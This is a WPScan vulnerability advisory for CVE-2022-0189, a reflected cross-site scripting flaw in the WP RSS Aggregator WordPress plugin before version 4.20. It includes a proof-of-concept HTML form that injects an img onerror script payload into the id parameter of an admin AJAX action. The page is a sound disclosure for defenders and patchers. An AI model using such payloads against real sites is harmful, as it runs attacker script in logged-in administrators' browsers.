WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP RSS Aggregator < 4.20 - Reflected Cross-Site Scripting (XSS)

Description

The plugin does not sanitise and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to a Reflected Cross-Site Scripting

Proof of Concept

Save the HTML below to a file with the .html extension, then open it in Firefox, while being authenticated in a separate tab to a WordPress site with the plugin installed.

<html>
    <form action="http://example.com/wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action" method="POST">
        <input type="text" value="<html><img src onerror=alert(`XSS`)>" name="id">
        <input type="submit" value="Send">
    </form>
</html>

Affects Plugins

wp-rss-aggregator
Fixed in version 4.20

References

CVE
CVE-2022-0189
URL
https://plugins.trac.wordpress.org/changeset/2659298

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
52a71bf1-b8bc-479e-b741-eb8fb9685014

Timeline

Publicly Published

2022-01-26 (about 8 months ago)

Added

2022-01-26 (about 8 months ago)

Last Updated

2022-04-09 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin